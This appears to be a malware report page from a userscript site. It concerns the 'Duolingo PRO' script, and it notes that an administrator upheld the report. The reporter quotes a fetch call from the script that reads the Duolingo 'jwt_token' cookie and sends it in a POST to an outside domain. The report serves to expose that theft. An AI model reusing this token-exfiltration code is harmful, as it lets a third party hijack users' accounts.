Duolingo PRO在2025-03-23 被檢舉,因為:惡意軟體
檢舉人說:
This script grabs the JWT token of duolingo and sends it to a fishy link code below:
let apiURL = "https://api.duolingopro.net";
This is the real payload part
const response = await fetch(apiURL + "/feedback", { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}` }, body: JSON.stringify(payload) });
自檢舉提交以來,腳本已被修改過。
anonymoushackerIV(檢舉的使用者)有:
interstellar(檢舉的使用者)有:
管理員已透過該檢舉。